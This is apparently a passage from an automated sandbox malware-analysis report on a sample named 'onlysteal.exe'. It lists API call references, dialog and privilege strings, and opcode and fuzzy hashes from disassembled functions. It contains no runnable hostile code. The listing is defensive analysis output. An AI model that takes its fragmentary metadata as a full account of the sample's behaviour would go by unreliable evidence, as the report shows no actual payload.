                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      Similarity
                                      • API ID: _wcschr$CompareString
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 69343711-3358265660
                                      • Opcode ID: cb936410b27a2203f438538d962cd049bafa974c3a0bbd333eec830d8dce7c6e
                                      • Instruction ID: 8a126f4a47415a20d5360bd4efe20f1d8f65361822e0e46ef89d17a16e1dbe17
                                      • Opcode Fuzzy Hash: cb936410b27a2203f438538d962cd049bafa974c3a0bbd333eec830d8dce7c6e
                                      • Instruction Fuzzy Hash: C6319671A2021A9ADF29CF54CC41EEE77BCEB15350F5045A6F905E7180EBB0DEA48FA1
                                      APIs
                                      • _swprintf.LIBCMT ref: 0023B9B8
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • _wcschr.LIBVCRUNTIME ref: 0023B9D6
                                      • _wcschr.LIBVCRUNTIME ref: 0023B9E6
                                      Similarity
                                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                                      • String ID: %c:\
                                      • API String ID: 525462905-3142399695
                                      • Opcode ID: 71063848135e4a9cce25befe45bc250203250c8530c08081af86ede8262a3e61
                                      • Instruction ID: 9278c61b08bf4d6fe6d5d94cdbe697d5709e650fce2d5f11ed28a23cf7c306d0
                                      • Opcode Fuzzy Hash: 71063848135e4a9cce25befe45bc250203250c8530c08081af86ede8262a3e61
                                      • Instruction Fuzzy Hash: 6A0149A3530312799631AF358C46D2BA3ACEE92371F40440AFA44D7082EB30D87986B1
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024B2BE
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0024B2D6
                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 0024B304
                                      Strings
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: GETPASSWORD1$xz(
                                      • API String ID: 445417207-642738945
                                      • Opcode ID: 0f0595681d82c674b825c4de5ad324f9bb8168cd77c60f3f448742ad73f1e139
                                      • Instruction ID: bbbb338e5d01ca43135442171f3ffe09406e6d7cd4f890915b7402feca90e360
                                      • Opcode Fuzzy Hash: 0f0595681d82c674b825c4de5ad324f9bb8168cd77c60f3f448742ad73f1e139
                                      • Instruction Fuzzy Hash: 4711E132920119B6DB26DE74AD4DFFF3B6CEB09700F000061FA45B2080C7E0DA619B61
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 0024B6ED
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0024B712
                                      • DeleteObject.GDI32(00000000), ref: 0024B744
                                      • DeleteObject.GDI32(00000000), ref: 0024B767
                                        • Part of subcall function 0024A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0024B73D,00000066), ref: 0024A6D5
                                        • Part of subcall function 0024A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A6EC
                                        • Part of subcall function 0024A6C2: LoadResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A703
                                        • Part of subcall function 0024A6C2: LockResource.KERNEL32(00000000,?,?,?,0024B73D,00000066), ref: 0024A712
                                        • Part of subcall function 0024A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0024B73D,00000066), ref: 0024A72D
                                        • Part of subcall function 0024A6C2: GlobalLock.KERNEL32(00000000), ref: 0024A73E
                                        • Part of subcall function 0024A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0024A762
                                        • Part of subcall function 0024A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0024A7A7
                                        • Part of subcall function 0024A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0024A7C6
                                        • Part of subcall function 0024A6C2: GlobalFree.KERNEL32(00000000), ref: 0024A7CD
                                      Strings
                                      Similarity
                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                      • String ID: ]
                                      • API String ID: 1797374341-3352871620
                                      • Opcode ID: 44d51a704c1ef4e6747942aa4b0bfaecf77ae2f369d67830dffa81244c0c8786
                                      • Instruction ID: 124b3ce166c6b09971a74929357f191ab806fcbb97987c0556cb9a56ab57f6b7
                                      • Opcode Fuzzy Hash: 44d51a704c1ef4e6747942aa4b0bfaecf77ae2f369d67830dffa81244c0c8786
                                      • Instruction Fuzzy Hash: 7A01D63795010267C716BB745C0EA7FBA7D9FC0752F050111F900A7295DF61CD254A61
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024D64B
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0024D661
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0024D675
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 0024D684
                                      Strings
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: fc06075d4dc5d0d209183cf22b0ec240e97876c9af110b48948a8cafa4f6e326
                                      • Instruction ID: f30feb56c42cb96a8c24415a78568e0114566698fb0e8a0333f8d3dfc68c8778
                                      • Opcode Fuzzy Hash: fc06075d4dc5d0d209183cf22b0ec240e97876c9af110b48948a8cafa4f6e326
                                      • Instruction Fuzzy Hash: 78014C332A5311BBD2148F64BE0DF57776CEB5AB01F020012F309A20D4C7A2AA348B79
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00257E24,00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002), ref: 00257E93
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00257EA6
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00257E24,00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002), ref: 00257EC9
                                      Strings
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4b26c6e230a8845c4a03155c49540f9387b3b0755abf898f36a6e015d5409c77
                                      • Instruction ID: c96cb0fea388c87e4a1237fc7104349c7e58c4ef9f511e8da1abeb8cb08adbd9
                                      • Opcode Fuzzy Hash: 4b26c6e230a8845c4a03155c49540f9387b3b0755abf898f36a6e015d5409c77
                                      • Instruction Fuzzy Hash: 69F06831954209BBCB12DFA4EC0DB9EBFB9EF44716F0081A9FC05A2150DB709E54CA94
                                      APIs
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4
                                      • GetProcAddress.KERNEL32(002781C8,CryptUnprotectMemory), ref: 0023F2F4
                                      Strings
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: 506cf63e5287d55346bc29d02f2c848cc5e010c3c3ce6948662e31ee17dc8037
                                      • Instruction ID: d7ec9d3c1582af7c632fb10ac60a1dd39dbd365e2d6b2717fa37c5d252d945d3
                                      • Opcode Fuzzy Hash: 506cf63e5287d55346bc29d02f2c848cc5e010c3c3ce6948662e31ee17dc8037
                                      • Instruction Fuzzy Hash: 1AE08670D347429EC721DF74A94DB027AD46F15700F14C85DF0DA93680DBB4D9E08B50
                                      APIs
                                      Similarity
                                      • API ID: AdjustPointer$_abort
                                      • String ID:
                                      • API String ID: 2252061734-0
                                      • Opcode ID: 134aa63e978f8c3d24b6d498b9e626b835191034ef5c0885cab6c5186becfe38
                                      • Instruction ID: 0777e019ff7456a8150fc586618feb832991a52bb0923a351aca20338ed9d751
                                      • Opcode Fuzzy Hash: 134aa63e978f8c3d24b6d498b9e626b835191034ef5c0885cab6c5186becfe38
                                      • Instruction Fuzzy Hash: 2451C172521212EFDB298F14D845B6A73B4FF56313F24401AEC05462E2E731ED6CDB98
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0025BF39
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025BF5C
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0025BF82
                                      • _free.LIBCMT ref: 0025BF95
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BFA4
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 29a017e4d224785dc905469e4cf89ee38fce1af36c78176781eda8d1fb507597
                                      • Instruction ID: 5081392c627b78e82ef3ef8f5038eb1218665c101fa9fc1288abdeeda0bc37b7
                                      • Opcode Fuzzy Hash: 29a017e4d224785dc905469e4cf89ee38fce1af36c78176781eda8d1fb507597
                                      • Instruction Fuzzy Hash: 7201F7726216167F23225A766C4DC7F6A6DDEC7BA23144129FD08D2140EFB0CD1589B4
                                      APIs
                                      • GetLastError.KERNEL32(?,00271030,00000200,002591AD,0025617E,?,?,?,?,0023D984,?,?,?,00000004,0023D710,?), ref: 0025986E
                                      • _free.LIBCMT ref: 002598A3
                                      • _free.LIBCMT ref: 002598CA
                                      • SetLastError.KERNEL32(00000000,00263A34,00000050,00271030), ref: 002598D7
                                      • SetLastError.KERNEL32(00000000,00263A34,00000050,00271030), ref: 002598E0
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: a02a52b94b6c78abdfa22b93b5812be4917ceac39bb5a27e0d451a2a75a95dce
                                      • Instruction ID: af181f55eef97721e5504d3c7f72068bef17d48e40e383ebb663e7292f14be81
                                      • Opcode Fuzzy Hash: a02a52b94b6c78abdfa22b93b5812be4917ceac39bb5a27e0d451a2a75a95dce
                                      • Instruction Fuzzy Hash: F2012136134602EBC6126B386C8E91A256DDFD33737210134FD04A2192EFB08C6D452D
                                      APIs
                                        • Part of subcall function 002411CF: ResetEvent.KERNEL32(?), ref: 002411E1
                                        • Part of subcall function 002411CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002411F5
                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00240F21
                                      • CloseHandle.KERNEL32(?,?), ref: 00240F3B
                                      • DeleteCriticalSection.KERNEL32(?), ref: 00240F54
                                      • CloseHandle.KERNEL32(?), ref: 00240F60
                                      • CloseHandle.KERNEL32(?), ref: 00240F6C
                                        • Part of subcall function 00240FE4: WaitForSingleObject.KERNEL32(?,000000FF,00241206,?), ref: 00240FEA
                                        • Part of subcall function 00240FE4: GetLastError.KERNEL32(?), ref: 00240FF6
                                      Similarity
                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                      • String ID:
                                      • API String ID: 1868215902-0
                                      • Opcode ID: 3c6300052dd1886fbbe7d3dc3340d769431d45e7d9cffca7bb2dc828be726bf6
                                      • Instruction ID: 1d9e3f55d6ab9b42f763594469d1eb61afa2dc575eb35bc2c685747d4eda1e44
                                      • Opcode Fuzzy Hash: 3c6300052dd1886fbbe7d3dc3340d769431d45e7d9cffca7bb2dc828be726bf6
                                      • Instruction Fuzzy Hash: 6F015271110744EFC7229B64EC88BC6BBA9FB08710F004929F25B52560CBB57A98CB90
                                      APIs
                                      • _free.LIBCMT ref: 0025C817
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025C829
                                      • _free.LIBCMT ref: 0025C83B
                                      • _free.LIBCMT ref: 0025C84D
                                      • _free.LIBCMT ref: 0025C85F
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 938673bebedc032015d16acb4f9a50087e9f966f9f50c184bef070801116db53
                                      • Instruction ID: 7ec44e9e1b9fe560ed63ff3983854a9312420aea64ca500738960471889aba24
                                      • Opcode Fuzzy Hash: 938673bebedc032015d16acb4f9a50087e9f966f9f50c184bef070801116db53
                                      • Instruction Fuzzy Hash: 8AF06832521305AF8A11EF78F48DC0A73F9AA107267655819F904E7551DFB1FC94CA58
                                      APIs
                                      • _wcslen.LIBCMT ref: 00241FE5
                                      • _wcslen.LIBCMT ref: 00241FF6
                                      • _wcslen.LIBCMT ref: 00242006
                                      • _wcslen.LIBCMT ref: 00242014
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0023B371,?,?,00000000,?,?,?), ref: 0024202F
                                      Similarity
                                      • API ID: _wcslen$CompareString
                                      • String ID:
                                      • API String ID: 3397213944-0
                                      • Opcode ID: 05deeaa4292a51af7810379b6b958c7dd47cd11a95e34c699641560c646c61fa
                                      • Instruction ID: 9af604ee765f558dbe4016369c4f3e6f9c67d042c16feac7eb9e6cebc26447c1
                                      • Opcode Fuzzy Hash: 05deeaa4292a51af7810379b6b958c7dd47cd11a95e34c699641560c646c61fa
                                      • Instruction Fuzzy Hash: A3F06232418014BBCF2A5F91EC09D8A7F65DF40761B119005F9155B061CB729A79DA94
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: b7b478ea043ab57b14d30ca5d03708f72269c91bb82332dd87f009b4a5aafba6
                                      • Instruction ID: 2e0c7e89ddf1816967a7f89b61ab7853c1398418462fa2edb976c5e9b5db8ac9
                                      • Opcode Fuzzy Hash: b7b478ea043ab57b14d30ca5d03708f72269c91bb82332dd87f009b4a5aafba6
                                      • Instruction Fuzzy Hash: 9451D7357B8700F6FB2E1E908D47F25B26E6B05B04F254506F396644E1C6E2E4F0AF1A
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\onlysteal.exe,00000104), ref: 00257FAE
                                      • _free.LIBCMT ref: 00258079
                                      • _free.LIBCMT ref: 00258083
                                      Strings
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\onlysteal.exe
                                      • API String ID: 2506810119-3503556797
                                      • Opcode ID: 7e1c48f74f959d352705f5a0f5d906a719a075ed87a8f7259a29a21dd70a860c
                                      • Instruction ID: 5fc05d5b81a17335af04dfce8d0bee77cda9b3a6b0affc3b8f9ea3933ff28a5d
                                      • Opcode Fuzzy Hash: 7e1c48f74f959d352705f5a0f5d906a719a075ed87a8f7259a29a21dd70a860c
                                      • Instruction Fuzzy Hash: AD31BF70A24219EFCB21DF9598849AEBBFCEF84311F104066ED04A7250DAB08E5CCBA4
                                      APIs
                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002531FB
                                      • _abort.LIBCMT ref: 00253306
                                      Strings
                                      Similarity
                                      • API ID: EncodePointer_abort
                                      • String ID: MOC$RCC
                                      • API String ID: 948111806-2084237596
                                      • Opcode ID: 36719f8f2602798b93bf9a33a7b9ae836c7d101deed11449007a4382c5ba7dcc
                                      • Instruction ID: b3dc99f8e1931e49d7031ea7fb7d3d2401ae86b8a3fc20acb7ae1905d711eff8
                                      • Opcode Fuzzy Hash: 36719f8f2602798b93bf9a33a7b9ae836c7d101deed11449007a4382c5ba7dcc
                                      • Instruction Fuzzy Hash: 5041597190020AAFCF15DF94CC81AEEBBB5BF08345F188099FD04A7251D335AE64DB99
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00237406
                                        • Part of subcall function 00233BBA: __EH_prolog.LIBCMT ref: 00233BBF
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 002374CD
                                        • Part of subcall function 00237A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00237AAB
                                        • Part of subcall function 00237A9C: GetLastError.KERNEL32 ref: 00237AF1
                                        • Part of subcall function 00237A9C: CloseHandle.KERNEL32(?), ref: 00237B00
                                      Strings
                                      Similarity
                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3813983858-639343689
                                      • Opcode ID: 48aa9ee6188522d65ee8181b236f76d62c050d5f4e9be1a1da19d66e7c77de57
                                      • Instruction ID: ed2fae6b2858a58129876562c80f20fc639e27ac6bd5fa81592cf59dcd08c5a1
                                      • Opcode Fuzzy Hash: 48aa9ee6188522d65ee8181b236f76d62c050d5f4e9be1a1da19d66e7c77de57
                                      • Instruction Fuzzy Hash: 6B31E6F1E24249AADF25EFA4DC45BEEBBB9AF05304F004015F905A7181C7748AA4CB60
                                      APIs
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • EndDialog.USER32(?,00000001), ref: 0024AD98
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0024ADAD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0024ADC2
                                      Strings
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: f3191c2d8efb1d7e51e290b7ca8b9321b8913667ae2e16e7ea774124832ff86a
                                      • Instruction ID: e601911f0241169f0e2956df5de082154ec8fe0e1363e8ebdc6daa743dd08f5b
                                      • Opcode Fuzzy Hash: f3191c2d8efb1d7e51e290b7ca8b9321b8913667ae2e16e7ea774124832ff86a
                                      • Instruction Fuzzy Hash: A011C872AE0201FFD7159F69EC49FAA7B69EF4A742F000016F241EB4A0C7619935DB23
                                      APIs
                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010438,0024B270,?,?), ref: 0024DE18
                                      Strings
                                      Similarity
                                      • API ID: DialogParam
                                      • String ID: GETPASSWORD1$r$$xz(
                                      • API String ID: 665744214-3022557106
                                      • Opcode ID: a30bd2dbaf0b9c52c59cbec8ecf0fca5ffc2687abd8b69f7903e8e89722097c5
                                      • Instruction ID: ff466025985d1e0deb20fd0b9e7eec19fd390db0c0fbfc12d32c63937ded9ddb
                                      • Opcode Fuzzy Hash: a30bd2dbaf0b9c52c59cbec8ecf0fca5ffc2687abd8b69f7903e8e89722097c5
                                      • Instruction Fuzzy Hash: 45115B32630254AADB16DE34AC09BAB3398EB0A750F144079FD49EB081C7F0ACA4C760
                                      APIs
                                      • __fprintf_l.LIBCMT ref: 0023D954
                                      • _strncpy.LIBCMT ref: 0023D99A
                                        • Part of subcall function 00241DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00271030,00000200,0023D928,00000000,?,00000050,00271030), ref: 00241DC4
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 562999700-834177443
                                      • Opcode ID: 2b674170aedc62926acf83473d0e96c529ae133781900c411ada5277cd5a2339
                                      • Instruction ID: a4f176604457498c26711700851cfbb3ab3073e39cfd7abab8d9149231ddd1d5
                                      • Opcode Fuzzy Hash: 2b674170aedc62926acf83473d0e96c529ae133781900c411ada5277cd5a2339
                                      • Instruction Fuzzy Hash: 9521B7B256024DAEEF20DFA4DC05FDE7BA8AF05300F040011F91096192E371DA78DF51
                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E85
                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E8F
                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0023AC5A,00000008,?,00000000,?,0023D22D,?,00000000), ref: 00240E9F
                                      Strings
                                      • Thread pool initialization failed., xrefs: 00240EB7
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 019afdf6d8fdebff32c76ef63e5dcd74235336c4c2e4509402e8c300f0732f55
                                      • Instruction ID: f8aa0d923cd9b45555990c355ae9a513fbdca9da7aa247fd33097bdbb3920d3e
                                      • Opcode Fuzzy Hash: 019afdf6d8fdebff32c76ef63e5dcd74235336c4c2e4509402e8c300f0732f55
                                      • Instruction Fuzzy Hash: F811C4B16107099FC3209F669CC89A7FBECEB55740F108C2EF1CAC2201D6B199A08B50
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: ($$2$$A
                                      • API String ID: 2696272793-2739150206
                                      • Opcode ID: d2779ced654faff5810280c0d621c392b505ab2cc67b6a891c7d36a9a74a7a44
                                      • Instruction ID: 13d4425f8b0312ae6dd7f0173135bce9a3eee760c2e4b5c2802d551047a28235
                                      • Opcode Fuzzy Hash: d2779ced654faff5810280c0d621c392b505ab2cc67b6a891c7d36a9a74a7a44
                                      • Instruction Fuzzy Hash: 2101DBB5901229ABCB14DFA4E8489DFBBF8AF09310F10415AE905E3250D7759E50CF94
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: dea69f01f0c6fe86a9daee7a493eb3857fc74a2084145dc5d9a6ed9277f31f49
                                      • Instruction ID: 65f23a3faa9a86f3d1572c7b5ade6ccae25b35b7d7c16aa8a165951e0fcbcd98
                                      • Opcode Fuzzy Hash: dea69f01f0c6fe86a9daee7a493eb3857fc74a2084145dc5d9a6ed9277f31f49
                                      • Instruction Fuzzy Hash: 2201887BE24255EFDB159F58FC4CA577BA8F709754B100426F809D3230C6B198B0DBA0
                                      APIs
                                        • Part of subcall function 0023E2E8: _swprintf.LIBCMT ref: 0023E30E
                                        • Part of subcall function 0023E2E8: _strlen.LIBCMT ref: 0023E32F
                                        • Part of subcall function 0023E2E8: SetDlgItemTextW.USER32(?,0026E274,?), ref: 0023E38F
                                        • Part of subcall function 0023E2E8: GetWindowRect.USER32(?,?), ref: 0023E3C9
                                        • Part of subcall function 0023E2E8: GetClientRect.USER32(?,?), ref: 0023E3D5
                                      • GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                      • SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      Strings
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: $$0
                                      • API String ID: 2622349952-1274290131
                                      • Opcode ID: f4e945887a683f0f9dd0d7b42a7520ab2c53efecfde762b13da7516e9a620a2a
                                      • Instruction ID: b4f0b119a99ef1b13e2c5d246b1444765746d55e40b0ec3749eb9cd65690641e
                                      • Opcode Fuzzy Hash: f4e945887a683f0f9dd0d7b42a7520ab2c53efecfde762b13da7516e9a620a2a
                                      • Instruction Fuzzy Hash: FFF062B012438DAADF155F64DC0DBEA3B59AF44344F048199FC49555A1CB74C9B8EB50
                                      APIs
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                      • Instruction ID: 48ec2ddf6c14c03748f9ddec6b9fae1dce0195b10ab6dc23ecfb5b62736a7614
                                      • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                      • Instruction Fuzzy Hash: FFA15B71920386DFEB15CF18C8917AEBBE5EF55312F14416EEC859B281C2388DE9CB58
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00237F69,?,?,?), ref: 0023A3FA
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00237F69,?), ref: 0023A43E
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00237F69,?,?,?,?,?,?,?), ref: 0023A4BF
                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,00237F69,?,?,?,?,?,?,?,?,?,?), ref: 0023A4C6
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: 41410a50cb5fb068db1dd9fbf26c5110b0d744e1ec226311d94ad46c1c862d63
                                      • Instruction ID: 798b2e202e025fc7c3b6ce5dfc41325e442cccd694e6054f83f3471e662ac585
                                      • Opcode Fuzzy Hash: 41410a50cb5fb068db1dd9fbf26c5110b0d744e1ec226311d94ad46c1c862d63
                                      • Instruction Fuzzy Hash: 4F41E1B1258382AAD731DF24DC49FAFBBE8AF81700F04096DF6D093180D6A49A5CDB53
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002591E0,?,00000000,?,00000001,?,?,00000001,002591E0,?), ref: 0025C9D5
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0025CA5E
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00256CBE,?), ref: 0025CA70
                                      • __freea.LIBCMT ref: 0025CA79
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: b0f4a005f4e19b9efbd9ff0e2121e8e45be5c41f76466c4df2aa8ad859efa25c
                                      • Instruction ID: 72f8ddf6fd49e020b24301006e65c1a6934f94eb15e81f842282fc23a7afd061
                                      • Opcode Fuzzy Hash: b0f4a005f4e19b9efbd9ff0e2121e8e45be5c41f76466c4df2aa8ad859efa25c
                                      • Instruction Fuzzy Hash: 5A31E132A2020AAFDF25DF64DC55DBE7BA5EB41311B244268FC04E7250E735DD68CB90
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0024A666
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0024A675
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0024A683
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0024A691
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: e662708a34f0c1231928df5872e34771ac5f740b1e5786bc5f813fae83d95a2c
                                      • Instruction ID: cb685c3be64cbf163a2c03e3919a30420c07906e605e4017a38f6d96b090e392
                                      • Opcode Fuzzy Hash: e662708a34f0c1231928df5872e34771ac5f740b1e5786bc5f813fae83d95a2c
                                      • Instruction Fuzzy Hash: E2E01231992722B7D7619B60BC1EB8B3E58AB05B62F010112FA09E61D0EBB486408BA1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
